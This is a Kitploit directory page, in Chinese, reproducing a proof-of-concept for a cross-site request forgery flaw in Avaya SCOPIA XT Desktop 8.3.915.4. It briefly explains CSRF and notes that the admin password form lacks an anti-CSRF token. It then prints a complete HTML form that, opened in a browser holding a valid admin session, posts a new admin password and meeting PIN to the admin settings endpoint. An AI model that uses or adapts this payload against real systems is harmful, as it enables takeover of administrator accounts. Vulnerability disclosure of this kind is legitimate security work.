Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4 — 概念验证,演示 Avaya SCOPIA XT Desktop 上的跨站请求伪造 (CSRF) 漏洞,允许在无防 CSRF 令牌的情况下更改管理员密码。 | Kitploit
工具/GitHubGitHub/v1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试
GitHubv1n1v131r4/exploit-csrf-on-scopia-xt-desktop-version-8.3.915.4

Exploit-CSRF-on-SCOPIA-XT-Desktop-version-8.3.915.4

概念验证,演示 Avaya SCOPIA XT Desktop 上的跨站请求伪造 (CSRF) 漏洞,允许在无防 CSRF 令牌的情况下更改管理员密码。

查看仓库

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
15年前尚未审核

利用 SCOPIA XT Desktop 8.3.915.4 版本上的 CSRF 漏洞

本 PoC 将描述如何利用 SCOPIA XT Desktop 8.3.915.4 版本上的跨站请求伪造(CSRF)漏洞。


关于 SCOPIA

网站:https://support.avaya.com/products/P1421/scopia-desktop/8.2.1


关于跨站请求伪造(CSRF)

跨站请求伪造,又称一键攻击或会话骑乘,缩写为 CSRF 或 XSRF,是一种恶意利用网站的方式,即从 Web 应用所信任的用户处传输未经授权的命令。


概念验证 - 修改管理员密码

1

在“Directory and Authentication”页面中,管理员可以更改其密码。

2

使用 Burp Suite 捕获请求后,我发现并未实现反 CSRF 令牌,唯一的安全机制是会话 Cookie。

6

我创建了这个 HTML 文件,作为利用上述漏洞的 PoC。

root@kitploit:~
<!DOCTYPE html>
<html>
<body>
	<form method="POST" action="http://example.org:80/scopia/admin/directory_settings.jsp">
		<input type="text" name="JSESSIONID" value="">
		<input type="text" name="newadminusername" value="">
		<input type="text" name="newadminpassword" value="3B09A36C1C32CF30EB8169F43227957C">
		<input type="text" name="newenablext1000meetingpin" value="false">
		<input type="text" name="newxt1000meetingpin" value="EB8169F43227957C">
		<input type="text" name="checkstatus" value="true">
		<input type="submit" value="Send">
	</form>
</body>
</html>

在浏览器中运行该文件时,如果浏览器拥有 SCOPIA XT Desktop 管理环境的有效 Cookie,就可以将 admin 用户的密码更改为“attacker”:

4

5

下载工具